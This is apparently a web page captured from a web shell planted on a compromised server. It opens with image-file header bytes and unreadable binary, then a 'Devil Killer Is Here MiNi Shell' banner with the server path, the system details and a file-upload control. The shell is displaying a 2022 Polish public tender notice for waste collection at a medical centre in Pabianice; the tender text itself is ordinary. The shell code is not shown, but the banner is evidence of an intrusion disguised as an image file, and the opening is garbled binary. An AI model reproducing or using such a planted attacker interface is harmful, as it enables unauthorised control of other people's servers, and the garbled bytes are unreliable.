JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220128/0003924101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa wywozu odpadów komunalnych z PCM Sp. z o. o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Pabianickie Centrum Medyczne Sp. z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 100682491</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Pawła II 68</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pabianice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pcmnzoz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pcmnzoz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa wywozu odpadów komunalnych z PCM Sp. z o. o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-19f34152-801a-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00039241</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://pcmnzoz.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zmiany i wyjaśnienia treści SWZ<br/>oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia<br/>będą udostępniane na stronie internetowej: http://pcmnzoz.pl/index.php/zamowienia<br/>W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywa się przy użyciu:<br/>a) miniPortalu: https://miniportal.uzp.gov.pl/- oferta<br/>b) ePUAPu: https://epuap.gov.pl/wps/portal - oferta<br/>(...)Ze względu na ograniczoną ilość znaków wprowadzanych do formularza, Zamawiający informuje iż<br/>wszelkie wymagania dotyczące niniejszego postępowania zawierają dokumenty zamówienia<br/>zamieszczone na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w<br/>szczególności składanie oświadczeń, zawiadomień oraz przekazywanie informacji odbywa się<br/>elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal (Formularz do komunikacji).<br/>2. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia (BZP) lub ID postępowania lub nr referencyjnym postępowania.<br/>3. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email: zamowienia@pcmnzoz.pl<br/>4. Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do<br/>komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych za pomocą poczty elektronicznej, na wskazany w ust. 3 adres email.<br/>5. Sposób sporządzania dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r.<br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>(...)Ze względu na ograniczoną ilość znaków wprowadzanych do formularza, Zamawiający informuje iż<br/>wszelkie wymagania dotyczące niniejszego postępowania zawierają dokumenty zamówienia<br/>zamieszczone na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">6/ZP/TP1/U/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Odpady w pojemnikach - 1100 L na zmieszane odpady komunalne niesegregowane (kod 20 03<br/>01) pojemnik 1248<br/>Odpady w pojemnikach - 240 L na zmieszane odpady komunalne segregowane (kod 20 03 01)<br/>pojemnik 52<br/>Odpady w pojemnikach - 1100 L na zmieszane odpady opakowaniowe (kod 15 01 06) pojemnik<br/>312<br/>Odpady w pojemnikach - 240 L na zmieszane odpady opakowaniowe (kod 15 01 06) pojemnik<br/>26<br/>Odpady w pojemnikach - 1,5 m3 typu Iglo na odpady szklane (kod 15 01 07) pojemnik 12 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie i porównaniu poddane zostaną oferty niepodlegające odrzuceniu.<br/>2. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami:<br/>Nazwa kryterium: Waga: Cena 100 %<br/>a) W zakresie kryterium „CENA” maksymalną ilość punktów (100 pkt.) otrzyma oferta z najniższą ceną,<br/>pozostałym Wykonawcom przyznana zostanie odpowiednio mniejsza liczba punktów, określona na<br/>podstawie następującego wzoru:<br/>cena brutto najniższa spośród wszystkich ofert<br/>niepodlegających odrzuceniu<br/>Ocena punktowa badanej oferty = ------------------------------------------------------------ x 100 x 100 %<br/>cena brutto oferty badanej<br/>1. Oceną oferty będzie suma punktów przyznanych według opisanych powyżej kryteriów tj. cena<br/>Uwaga: przy obliczaniu punktów, Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku<br/>według zasady, że trzecia cyfra po przecinku od 5 w górę powoduje zaokrąglenie drugiej cyfry po<br/>przecinku w górę o 1. Jeśli trzecia cyfra po przecinku jest mniejsza niż 5, to druga cyfra po przecinku<br/>nie ulega zmianie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Odpady w kontenerze typu KP - 7 na odpady BIO (kod 20 02 01) *na żądanie Zamawiającego<br/>kontener 12<br/>Odpady w kontenerze typu KP - 7 - na odpady gabarytowe (kod 20 03 07) *na żądanie<br/>Zamawiającego kontener 15<br/>Odpady w kontenerze typu KP - 7 - na odpady z budowy i remontów, demontażu (kod 17 09 04)<br/>*na żądanie Zamawiającego kontener 15 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie i porównaniu poddane zostaną oferty niepodlegające odrzuceniu.<br/>2. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami:<br/>Nazwa kryterium: Waga: Cena 100 %<br/>a) W zakresie kryterium „CENA” maksymalną ilość punktów (100 pkt.) otrzyma oferta z najniższą ceną,<br/>pozostałym Wykonawcom przyznana zostanie odpowiednio mniejsza liczba punktów, określona na<br/>podstawie następującego wzoru:<br/>cena brutto najniższa spośród wszystkich ofert<br/>niepodlegających odrzuceniu<br/>Ocena punktowa badanej oferty = ------------------------------------------------------------ x 100 x 100 %<br/>cena brutto oferty badanej<br/>1. Oceną oferty będzie suma punktów przyznanych według opisanych powyżej kryteriów tj. cena<br/>Uwaga: przy obliczaniu punktów, Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku<br/>według zasady, że trzecia cyfra po przecinku od 5 w górę powoduje zaokrąglenie drugiej cyfry po<br/>przecinku w górę o 1. Jeśli trzecia cyfra po przecinku jest mniejsza niż 5, to druga cyfra po przecinku<br/>nie ulega zmianie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Odpady w pojemnikach - 140 L na odpady BIO (kod 20 02 01) pojemnik 12<br/>Odpady w pojemnikach - 120 L na odpady szklane (kod 15 01 07) pojemnik 12 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie i porównaniu poddane zostaną oferty niepodlegające odrzuceniu.<br/>2. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami:<br/>Nazwa kryterium: Waga: Cena 100 %<br/>a) W zakresie kryterium „CENA” maksymalną ilość punktów (100 pkt.) otrzyma oferta z najniższą ceną,<br/>pozostałym Wykonawcom przyznana zostanie odpowiednio mniejsza liczba punktów, określona na<br/>podstawie następującego wzoru:<br/>cena brutto najniższa spośród wszystkich ofert<br/>niepodlegających odrzuceniu<br/>Ocena punktowa badanej oferty = ------------------------------------------------------------ x 100 x 100 %<br/>cena brutto oferty badanej<br/>1. Oceną oferty będzie suma punktów przyznanych według opisanych powyżej kryteriów tj. cena<br/>Uwaga: przy obliczaniu punktów, Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku<br/>według zasady, że trzecia cyfra po przecinku od 5 w górę powoduje zaokrąglenie drugiej cyfry po<br/>przecinku w górę o 1. Jeśli trzecia cyfra po przecinku jest mniejsza niż 5, to druga cyfra po przecinku<br/>nie ulega zmianie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów:<br/>- Wykona przedmiot zamówienia zgodnie z powszechnie obowiązującymi przepisami prawa, a w<br/>szczególności ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach<br/>(Dz.U. z 2021 r., poz. 888) oraz ustawą o odpadach z dnia 14 grudnia 2012 r. (Dz. U. 2021, poz.<br/>779).<br/>- posiada aktualny wpis do rejestru działalności regulowanej, o którym stanowi art. 9 b ustawy z<br/>dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach, prowadzonym przez<br/>właściwy organ, w zakresie objętym przedmiotem zamówienia,<br/>- posiada zezwolenie na zbieranie odpadów lub zezwolenie na przetwarzanie odpadów, lub<br/>koncesją na podziemne składowanie odpadów, pozwoleniem zintegrowane, decyzją<br/>zatwierdzającą program gospodarowania odpadami wydobywczymi, zezwoleniem na<br/>prowadzenie obiektu unieszkodliwiania odpadów wydobywczych lub wpisem do rejestru<br/>działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości - na podstawie odrębnych przepisów, lub wpisem do rejestru w zakresie, o<br/>którym mowa w art. 50 ust. 1 pkt 5 ustawy z dnia 14 grudnia 2012 r. o odpadach; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu wykazania braku podstaw do wykluczenia z postępowania<br/>Wykonawca, którego oferta została najwyżej oceniona, na wezwanie Zamawiającego przedłoży w<br/>terminie nie krótszym niż 5 dni od dnia wezwania następujące podmiotowe środki dowodowe:<br/>1) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania – Załącznik nr 4 do SWZ.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. oświadczenie<br/>(podmiotowe środki dowodowe) składa każdy z wykonawców.<br/>2) aktualny wpis do rejestru działalności regulowanej, o którym stanowi art. 9 b ustawy z dnia 13<br/>września 1996 r. o utrzymaniu czystości i porządku w gminach, prowadzonym przez właściwy organ, w<br/>zakresie objętym przedmiotem zamówienia,<br/>3) posiada zezwolenie na zbieranie odpadów lub zezwolenie na przetwarzanie odpadów, lub koncesją<br/>na podziemne składowanie odpadów, pozwoleniem zintegrowane, decyzją zatwierdzającą program<br/>gospodarowania odpadami wydobywczymi, zezwoleniem na prowadzenie obiektu unieszkodliwiania<br/>odpadów wydobywczych lub wpisem do rejestru działalności regulowanej w zakresie odbierania<br/>odpadów komunalnych od właścicieli nieruchomości - na podstawie odrębnych przepisów, lub wpisem<br/>do rejestru w zakresie, o którym mowa w art. 50 ust. 1 pkt 5 ustawy z dnia 14 grudnia 2012 r. o<br/>odpadach;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> WYKAZ DOKUMENTÓW, KTÓRE NALEŻY ZŁOŻYĆ WRAZ Z OFERTĄ:<br/>1) Wypełniony Załącznik nr 1 do SWZ - Formularz Oferty;<br/>2) Wypełniony Załącznik nr 2 do SWZ – formularz cenowy;<br/>3) Wypełniony Załącznik nr 3 do SWZ - Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp:<br/>a) W odpowiedzi na ogłoszenie o zamówieniu Wykonawca dołącza do oferty oświadczenie, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>b) Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp stanowi dowód potwierdzający<br/>brak podstaw wykluczenia o których mowa w art. 108 ust. 1 ustawy Pzp, spełnianie warunków<br/>udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez<br/>Zamawiającego podmiotowe środki dowodowe.<br/>c) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, ww. oświadczenie<br/>składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4) Przedmiotowe środki dowodowe w celu potwierdzenia, czy oferowany wyrób spełnia<br/>wymagania określone w SWZ, , o których mowa w Rozdziale 13 ust. 1 pkt 1 SWZ.<br/>5) Pełnomocnictwo (jeżeli dotyczy):<br/>a) Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty<br/>dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do<br/>złożenia oferty i podpisania umowy.<br/>b) W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego<br/>będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>wykonawców należy załączyć do oferty. <br/>6) Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru - w celu 